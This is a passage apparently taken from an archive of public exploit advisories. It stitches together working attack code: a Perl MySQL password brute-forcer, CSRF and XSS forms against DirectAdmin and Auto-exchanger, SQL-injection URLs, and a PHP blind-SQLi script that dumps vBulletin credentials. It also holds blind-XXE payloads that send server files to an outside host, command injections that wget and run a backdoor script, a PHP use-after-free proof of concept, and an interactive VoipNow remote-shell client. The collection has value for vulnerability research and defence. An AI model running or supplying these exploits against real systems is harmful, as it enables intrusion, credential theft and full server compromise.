2015, coordinated through CSOC. Since April 2015 they have been postponing the
fix.
source: https://www.securityfocus.com/bid/56837/info
MySQL and MariaDB are prone to a security-bypass weakness.
An attacker may be able to exploit this issue to aid in brute-force attacks; other attacks may also be possible.
use Net::MySQL;
# Autoflush so the "Cracked" line is not held back by buffering when piped.
$|=1;
# One genuine login establishes the session; its salt and capability flags
# are reused for every guess below. Host and credentials are hard-coded.
my $mysql = Net::MySQL->new(
hostname => '192.168.2.3',
database => 'test',
user => "user",
password => "secret",
debug => 0,
);
# Account whose password is guessed; candidates arrive one per line on stdin
# (the example session pipes john --stdout into this script).
$crackuser = "crackme";
while(<stdin>) {
chomp;
$currentpass = $_;
# Hand-built COM_CHANGE_USER (0x11) body: user, NUL, 0x14 (20-byte length
# prefix), scramble, NUL. Every guess is a change-user request on the one
# already-authenticated connection rather than a fresh login, which is
# presumably the "security-bypass" the advisory refers to; server-side,
# counting failed change-user attempts per connection is the detection hook.
$vv = join "\0",
$crackuser,
"\x14".
Net::MySQL::Password->scramble(
$currentpass, $mysql->{salt}, $mysql->{client_capabilities}
) . "\0";
# Uses Net::MySQL's private _execute_command and a loose "ne undef" test:
# any non-empty reply is taken as success.
if ($mysql->_execute_command("\x11", $vv) ne undef) {
print "[*] Cracked! --> $currentpass\n";
exit;
}
}
---
example session:
C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382 time: 0:00:00:02 w/s: 6262 current: citcH
words: 24573 time: 0:00:00:04 w/s: 4916 current: rap
words: 40956 time: 0:00:00:07 w/s: 5498 current: matc3
words: 49147 time: 0:00:00:09 w/s: 5030 current: 4429
words: 65530 time: 0:00:00:12 w/s: 5354 current: ch141
words: 73721 time: 0:00:00:14 w/s: 5021 current: v3n
words: 90104 time: 0:00:00:17 w/s: 5277 current: pun2
[*] Cracked! --> pass
words: 98295 time: 0:00:00:18 w/s: 5434 current: 43gs
Session aborted
source: https://www.securityfocus.com/bid/56860/info
The Simple Gmail Login plugin for Wordpress is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
Simple Gmail Login 1.1.3 and prior are vulnerable.
Fatal error: Uncaught exception 'Exception' with message
'DateTimeZone::__construct() [<a
href='datetimezone.--construct'>datetimezone.--construct</a>]: Unknown or bad timezone ()' in
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php:229
Stack trace: #0
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(229):
DateTimeZone->__construct('') #1
C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php(210):
SimpleGmail_Plugin->log('Plugin activate...', false) #2 [internal
function]: SimpleGmail_Plugin->activate('') #3
C:\xampp\htdocs\wordpress\wp-includes\plugin.php(403):
call_user_func_array(Array, Array) #4
C:\xampp\htdocs\wordpress\wp-admin\plugins.php(157):
do_action('activate_simple...') #5 {main} thrown in C:\xampp\htdocs\wordpress\wp-content\plugins\simple-gmail-login\simple-gmail-login.php
on line 229
=============================================================================
[+] Exploit Title : DirectAdmin Web Control Panel CSRF/XSS vulnerability
[+] Exploit Author : Ashiyane Digital Security Team
[+] Date : 2015/09/08
[+] Version : 1.483
[+] Tested on : Elementary Os
[+] Vendor Homepage : http://www.directadmin.com/
=============================================================================
[+] Introduction :
DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier.
DirectAdmin suffers from cross-site request forgery (CSRF) and cross-site scripting (XSS) vulnerabilities.
=============================================================================
[+] CMD_FILE_MANAGER :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit 1: Create New File and Edit a file
<!-- CSRF PoC: a logged-in DirectAdmin user who loads this page saves
attacker-chosen content as index.php in their own public_html. As written
the form is never closed (no </form>). Server-side fix: a per-session token
validated on every CMD_FILE_MANAGER POST, plus SameSite on the session cookie. -->
<form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="path" value="/domains/address/public_html">
<input type="hidden" name="text" value="<?php //codes ?>">
<input type="hidden" name="filename" value="index.php">
<input type="submit" onClick="save=0;" value="Save As">
-----------------------------------------------------------------------------
[+] Exploit 2: Create a New Folder
<!-- CSRF PoC: folder creation. NOTE(review): the quoting on the action and
path inputs is malformed as pasted (the type attribute swallows the rest of
the tag), so browsers will not submit those fields as intended. Same
anti-CSRF token mitigation as the other CMD_FILE_MANAGER actions. -->
<form name=folderform action="/CMD_FILE_MANAGER" method="POST">
<input type="hidden name=action value="folder">
<input type="hidden name="path" value="/domains/iceschool.ir/public_html">
<input type="hidden" name="name" value="Folder">
<input type=submit value="Create">
</form>
-----------------------------------------------------------------------------
[+] Exploit 3: Rename a file
<form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type=hidden name=action value="rename">
<input type="hidden" name="path" value="/domains/address/public_html">
<input type="hidden" name="old" value="Oldname">
<input type="hidden" name="filename" value="Newname">
<input type="hidden" name="overwrite" value="yes">
<input type="submit" value="Rename">
</form>
-----------------------------------------------------------------------------
[+] Exploit 4 : Reflected XSS
<form name='info' action='http://address:port/CMD_FILE_MANAGER' method='POST'>
<input type="hidden" name="action" value="edit">
<input type="hidden" name="path" value='/xss/"><script>alert(/XSS Vuln/)</script>'>
<input type="hidden" name="text" value="xss">
<input type="hidden" name="filename" value="xss">
<input type="submit" onClick="save=0;" value="Save As">
</form>
=============================================================================
[+] CMD_FTP :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create FTP account
<form name="reseller" action="http://address:port/CMD_FTP" method="post">
<input style="display:none" type="text" name="fakeusernameremembered"/>
<input style="display:none" type="password" name="fakepasswordremembered"/>
<input type="hidden" name="action" value="create">
<input type="hidden" name="domain" value="domain.xyz"> <!-- Example : ashiyane.org -->
<input type="hidden" name="user" value="ehsan">
<input type="hidden" name="passwd" value="pass1234">
<input type="hidden" name="passwd2" value="pass1234">
<input type="hidden" name="type" value="domain" checked>
<input type="hidden" name="type" value="ftp">
<input type="hidden" name="type" value="user">
<input type="hidden" name="type" value="custom">
<input type="hidden" name="custom_val" value="/home/domain"> <!-- Example : /home/ashiyane -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] CMD_DB :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create new Database
<form name=reseller action="http://address:port/CMD_DB" method="post">
<input type="hidden" name=action value=create>
<input type="hidden" name=domain value="domain.xyz"> <!-- Domain -->
<input type="hidden" name="name" value="dbname"> <!-- Database Name -->
<input type="hidden" name="user" value="ehsan"> <!-- Username -->
<input type="hidden" name="passwd" value="pass1234"> <!-- Password -->
<input type="hidden" name="passwd2" value="pass1234"> <!-- Password -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] CMD_EMAIL_FORWARDER :
[+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site
[+] Exploit : Create new E-Mail Forwarder
<form name=info action="CMD_EMAIL_FORWARDER" method="post">
<input type=hidden name=action value=create>
<input type=hidden name=domain value="domain.xyz"><!-- Domain -->
<input type="hidden" name="user" value="info"> <!-- Forwarder Name -->
<input type="hidden" name="email" value="hehsan979@gmail.com"> <!-- Destination Email -->
<input type="submit" name="create" value="Create">
</form>
=============================================================================
[+] Discovered By : Ehsan Hosseini (hehsan979@gmail.com)
source: https://www.securityfocus.com/bid/56862/info
FOOT Gestion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?page=contacter.php&id=-1 union select 1,2--%20
source: https://www.securityfocus.com/bid/56877/info
The ajaxReg module for vBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/php
<?
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.example.com/watch?v=LlKaYyJxH7E
# check it : http://www.example.com/vBulletin/clientscript/register.js
# Prints the banner and usage text for this script, then terminates the
# process. Never returns.
function usage ()
{
    $lines = [
        'vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit',
        'Author: Cold z3ro',
        'Site : http://www.example.com | www.example.com',
        'vandor: http://www.example.com/forum/showthread.php?t=144869',
        'Usage : php 0day.php <hostname> <path> [userid] [key]',
        'Ex. : php 0day.php www.example.com /vBulletin/ 1 abcdefghijklmnopqrstuvwxyz',
        'Note. : Its a 0day exploit',
    ];
    # Every line is prefixed with "\n[+] "; the text ends with two newlines.
    echo "\n[+] " . implode("\n[+] ", $lines) . "\n\n";
    exit();
}
# One boolean probe of the blind injection: asks ajax.php (do=CheckUsername)
# whether the character at position $pos of column $field for user $usid has
# the ASCII code of $char, and reports how the page answered.
# Returns true when the response (headers + body, captured with output
# buffering because CURLOPT_RETURNTRANSFER is not set) contains 'Invalid'
# (case-insensitive), false otherwise. There is no error handling: a failed
# request prints nothing, so $con is empty and false is returned as well.
# The query string (ascii(substring((SELECT/**/...)) with /**/ as spacing) is
# the pattern a WAF/IDS rule can match.
# NOTE(review): eregi() was removed in PHP 7, so this only runs on PHP 5.x.
function check ($hostname, $path, $field, $pos, $usid, $char)
{
$char = ord ($char); # compare by ASCII code, as ascii(substring(...)) does server-side
$inj = 'ajax.php?do=CheckUsername¶m=';
$inj.=
"admin'+and+ascii(substring((SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1))={$char}/*";
$culr = $hostname.$path.$inj;
$curl = curl_init();
curl_setopt ($curl, CURLOPT_URL, $culr );
curl_setopt($curl, CURLOPT_HEADER, 1); # response headers end up in $con too
curl_setopt($curl, CURLOPT_VERBOSE, 0);
ob_start(); # curl_exec() prints the response; capture it instead of letting it reach stdout
curl_exec ($curl);
curl_close ($curl);
$con = ob_get_contents();
ob_end_clean();
if(eregi('Invalid',$con))
return true;
else
return false;
}
# Recovers the value of column $field for user $usid one character at a time:
# for each position $pos every candidate character in $key is tried through
# check(); on a hit the character is echoed, the candidate index is reset
# ($chr = -1, incremented back to 0 below) and $pos advances. The loop ends
# when no candidate matches at the current position, i.e. past the end of the
# value. Prints to stdout and returns nothing. Each candidate costs one HTTP
# request, so up to strlen($key) requests are made per recovered character.
function brutechar ($hostname, $path, $field, $usid, $key)
{
$pos = 1;
$chr = 0;
while ($chr < strlen ($key))
{
if (check ($hostname, $path, $field, $pos, $usid, $key [$chr]))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}
}
# --- CLI entry point ---
# Accepts exactly three user arguments (count($argv) == 4: script, hostname,
# path, userid); any other count prints the usage text and exits. Because of
# that check $argv[4] is never defined here, so $key always falls through to
# the default alphabet below.
if (count ($argv) != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$usid = $argv [3];
$key = $argv [4];
if (empty ($key))
$key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; # candidate characters tried per position
echo "[+] Username: ";
brutechar ($hostname, $path, "username", $usid, $key); # column 'username' of table user
echo "\n[+] Password: ";
brutechar ($hostname, $path, "password", $usid, $key); # column 'password' of table user
echo "\n[+] Done..";
echo "\n[+] It's not fake, its real.";
# word to 1337day.com, stop scaming me
?>
Exploit Title: Qlikview blind XXE security vulnerability
Product: Qlikview
Vulnerable Versions: v11.20 SR11 and previous versions
Tested Version: v11.20 SR4
Advisory Publication: 08/09/2015
Latest Update: 08/09/2015
Vulnerability Type: Improper Restriction of XML External Entity Reference [CWE-611]
CVE Reference: CVE-2015-3623
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor: QLIK
Product & Version:
QlikView v11.20 SR4
Vendor URL & Download:
http://www.qlik.com/us/explore/products/qlikview
Product Description:
"The QlikView Business Discovery platform delivers true self-service BI that empowers business users by driving innovative decision-making."
(2) Vulnerability Details:
--------------------------
The Qlikview platform is vulnerable to XML External Entity (XXE) injection. More specifically, the platform
is susceptible to DTD parameter-entity injection, which is also "blind" because the server returns no visible response. These vulnerabilities can be exploited
to force Server-Side Request Forgery (SSRF) over multiple protocols, as well as to read and extract arbitrary files from the server.
Proof of concept for XXE [CVE-2015-5361]:
-----------------------------------------
URL: https://<QLIKVIEW>/AccessPoint.aspx
Attack Pattern for SSRF:
------------------------
In POST body:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE update [
<!ENTITY % external SYSTEM "http://yourserver.com">
%external;]>
OR simply
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag PUBLIC "-//WHITE//NINJA//EN" "http://yourserver.com">
As this is a blind XXE, you will see no response from server, but yourserver.com will receive the HTTP request from the Qlikview server. Also works with FTP and HTTPS protocols.
Attack Pattern for reading and extracting arbitrary files:
------------------------------------------
In POST body:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % remote SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://yourserver.com/test.dtd">
%dtd;
%send;
]]>
The test.dtd file on yourserver.com will need to contain the following:
Test.dtd
--------
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://yourserver.com/?%remote;'>">
%all;
As the response is blind, you will see no response from the server, but yourserver.com will receive the file contents as part of the URL in lieu of the %remote parameter.
(3) Advisory Timeline:
----------------------
29/04/2015 - First Contact informing vendor of vulnerability
30/04/2015 - Response requesting details of vulnerability. Details sent
05/05/2015 - Vendor indicates issue is under investigation.
06/05/2015 - Vendor confirms vulnerability and has started working on resolving the issue.
20/05/2015 - Vendor confirms root cause has been identified and patch is under internal testing.
08/06/2015 - Vendor confirms patch ready and requests 90 day restraint on vulnerability release to give clients time to patch.
10/06/2015 - Patch 11.20 SR12 released, fixing the vulnerability
08/09/2015 - Public disclosure of vulnerability.
(4)Solution:
------------
Upgrading to QV11.20 SR12 corrects the vulnerability.
(5) Credits:
------------
Discovered by Alex Haynes
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3623
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3623
source: https://www.securityfocus.com/bid/56881/info
Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.
Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.
Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected.
1.
<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl"
method="post" name=f1>
<input type="hidden" name="platformDD2" value='android' />
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
2.
<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl"
method="post" name=f1>
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
3.
<form
action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl"
method="post" name=f1>
<input type="hidden" name="appURLPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
4.
<form
action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl"
method="post" name=f1>
<input type="hidden" name="ipAddressTB" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
<!--
# Exploit Title: [Auto-exchanger version 5.1.0 Xsrf]
# Date: [2015/06/05]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : [https://www.linkedin.com/profile/view?id=276969082]
# Vendor Homepage: [www.auto-exchanger.com]
# Version: [Version 5.1.0]
# Demo : www.farhadexchange.com
# CVE : [CVE-2015-6827]
------------------------------------
details:
------------------------------------
Auto-exchanger version 5.1.0 suffers from an XSRF vulnerability: an attacker
is able to abuse it to change a user's password through a hidden
iframe embedded in another page.
-------------------------------------
Exploit:
-------------------------------------
-->
<html>
<body>
<iframe style="display:none" name="xsrf-frame"></iframe>
<form method='POST' action='http://farhadexchange.com/signup.php'
target="xsrf-frame" id="xsrf-form">
<label id="lbl_error" name="lbl_error" class="ErrorMessage"></label>
<INPUT type="hidden" name="suser" value="victim_user">
<input type="hidden" name="section" value="do_update" />
<label type='hidden' id="n_password0"><span>
<input type='hidden' maxlength="20" size="30" name="password0"
id="password0" value="testpassword123456" > </label>
<input type="hidden" name="rid" value="" />
<label id="n_password">
<input type="hidden" maxlength="20" size="30" name="password1"
id="password1" value="testpassword123456" ></label>
<label id="n_mail">
<INPUT type='hidden' maxLength=60 size=30 name="mail" id="mail"
value="victim_email" type="text">
</label>
<label id="n_country">
<input type='hidden' name="country" id="country" style="width:196;"
value="IR">
</label>
<label id="cid">
<input type='hidden' name='cid' value='2'/>
</label>
<label id="n_curreny_account">
<INPUT type='hidden' maxLength=60 size=30 name="curreny_account"
id="curreny_account" value="" ><br>
</label>
</form>
<script>document.getElementById("xsrf-form").submit()</script>
</body>
</html>
source: https://www.securityfocus.com/bid/56882/info
Simple Invoices is prone to multiple HTML-injection vulnerabilities and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
[http://]www.example.com/simpleinvoices/index.php?module=invoices&view=manage&having=%3C/script%3E%3Cscript%3Ealert%28%27POC%20XSS%27%29;%3C/script%3E%3Cscript%3E
Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
Taoguang Chen <[@chtg](http://github.com/chtg)> -
Write Date: 2015.8.27
Release Date: 2015.9.4
A use-after-free vulnerability was discovered in unserialize() with SplDoublyLinkedList object deserialization combined with a crafted object's __wakeup() magic method; it can be abused to leak arbitrary memory blocks or to execute arbitrary code remotely.
Affected Versions
------------
Affected is PHP 5.6 < 5.6.13
Affected is PHP 5.5 < 5.5.29
Affected is PHP 5.4 < 5.4.45
Credits
------------
This vulnerability was disclosed by Taoguang Chen.
Description
------------
while(*p == ':') {
++p;
ALLOC_INIT_ZVAL(elem);
if (!php_var_unserialize(&elem, &p, s + buf_len, &var_hash TSRMLS_CC)) {
zval_ptr_dtor(&elem);
goto error;
}
spl_ptr_llist_push(intern->llist, elem TSRMLS_CC);
}
It has been demonstrated many times before that __wakeup() can lead to a
ZVAL being freed from memory. However, deserialization still
allows R: or r: to set references to that already-freed memory.
This makes a use-after-free attack and remote arbitrary code execution
possible.
Proof of Concept Exploit
------------
The PoC works on standard MacOSX 10.11 installation of PHP 5.6.12.
<?php
// Minimal object whose __wakeup() hook assigns the integer 1 to its single
// property; unserialize() invokes the hook after restoring the object.
class obj {
    public $ryat;

    public function __wakeup() {
        $this->ryat = 1;
    }
}
// Fake zval assembled from 8-byte little-endian words via ptr2str() (defined
// below): the controlled value 1122334455, a zero word, then trailing bytes.
// 1122334455 is the int that appears in the sample var_dump output further down.
$fakezval = ptr2str(1122334455);
$fakezval .= ptr2str(0);
$fakezval .= "\x00\x00\x00\x00";
$fakezval .= "\x01";
$fakezval .= "\x00";
$fakezval .= "\x00\x00";
// Serialized payload: a 5-element array holding an SplDoublyLinkedList
// (C:19:"SplDoublyLinkedList" with $inner as its data), an obj whose
// __wakeup() runs during unserialize(), two back-references (R:3, R:5) and
// the fake zval as a string. unserialize() on the affected PHP versions listed
// above is the trigger; var_dump() prints the result (see sample output below).
$inner = 'i:1234;:i:1;';
$exploit = 'a:5:{i:0;i:1;i:1;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:2;O:3:"obj":1:{s:4:"ryat";R:3;}i:3;a:1:{i:0;R:5;}i:4;s:'.strlen($fakezval).':"'.$fakezval.'";}';
$data = unserialize($exploit);
var_dump($data);
// Packs the low 64 bits of the integer $ptr as eight bytes, least significant
// byte first (little-endian). Returns an 8-byte binary string.
function ptr2str($ptr)
{
    $bytes = [];
    while (count($bytes) < 8) {
        $bytes[] = chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return implode('', $bytes);
}
?>
Test the PoC on the command line:
$ php uafpoc.php
array(5) {
[0]=>
int(1)
[1]=>
&int(1)
[2]=>
object(obj)#2 (1) {
["ryat"]=>
&int(1)
}
[3]=>
array(1) {
[0]=>
int(1122334455) <=== so we can control the memory and create fake ZVAL :)
}
[4]=>
string(24) "?v?B????"
}
source: https://www.securityfocus.com/bid/57009/info
The Transactions Plugin for MyBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Transactions 2.0 is vulnerable; other versions may also be affected.
http://www.example.com//bank.php?transactions=[SQLi]
source: https://www.securityfocus.com/bid/57032/info
VoipNow Service Provider Edition is prone to a remote arbitrary command-execution vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to execute arbitrary commands within the context of the vulnerable application.
Versions of VoipNow Service Provider Edition prior to 2.3 are vulnerable; other versions may also be affected.
<?
# Title: 4psa VoipNow < 2.3 , Remote Command Execution vuln
# Software Link: http://www.4psa.com/products-4psavoipnow.html
# Author: Faris , aka i-Hmx
# Home : sec4ever.com , 1337s.cc
# Mail : n0p1337@gmail.com
# Tested on: VoipNow dist.
/*
VoipNow suffers from a critical RCE vulnerability.
Vulnerable File : plib/xajax_components.php
Snip.
if ( isset( $_GET['varname'] ) )
{
$func_name = $_GET['varname'];
$func_arg = $_POST["fid-".$_GET['varname']];
$func_params = $_GET;
if ( function_exists( $func_name ) )
{
echo $func_name( $func_arg, $func_params );
}
else
{
echo "<ul><li>Function: ".$func_name." does not exist.</li></ul>";
}
}
Demo Exploit :
Get : plib/xajax_components.php?varname=system
Post : fid-system=echo WTF!!
so the result is
echo system( 'echo WTF!!', array() );
the system var need just the 1st parameter
so don't give fu#* about the array :D
Peace out
*/
# --- interactive client ---
# Prints the banner, then reads the target base URL (e.g. https://ip) from
# stdin. $target is used verbatim as the URL prefix in the loop below.
echo "\n+-------------------------------------------+\n";
echo "| VoipNow 2.5.3 |\n";
echo "| Remote Command Execution Exploit |\n";
echo "| By i-Hmx |\n";
echo "| n0p1337@gmail.com |\n";
echo "+-------------------------------------------+\n";
echo "\n| Enter Target [https://ip] # ";
$target=trim(fgets(STDIN)); # no validation of the entered value
# Issues one HTTP POST of $post (raw string) to $url with cURL and returns the
# response body (CURLOPT_RETURNTRANSFER set, headers excluded). Redirects are
# not followed and the whole transfer is capped at 20 seconds. TLS certificate
# checks are disabled (SSL_VERIFYPEER false, SSL_VERIFYHOST 0), so any
# certificate is accepted. Cookie file and jar both point at '/'.
# Returns the body as a string, or false when curl_exec() fails.
function faget($url,$post){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post); # string body; also switches the request to POST
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); # certificate chain not verified
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); # hostname not checked against the certificate
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, false);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
# Read-eval loop: each line typed at the prompt is sent as the 'fid-system'
# POST field to plib/xajax_components.php?varname=system (the request pattern
# described in the comment block above) and the response body is echoed.
# Typing "exit" ends the loop. The prompt shows $target without its "https://"
# prefix. On stdin EOF fgets() returns false, so $cmd becomes "" and the loop
# keeps sending empty commands.
while(1)
{
echo "\ni-Hmx@".str_replace("https://","",$target)."# ";
$cmd=trim(fgets(STDIN));
if($cmd=="exit"){exit();}
$f_rez=faget($target."/plib/xajax_components.php?varname=system","fid-system=$cmd");
echo $f_rez;
}
# NP : Just cleaning my pc from an old old trash , The best is yet to come ;)
?>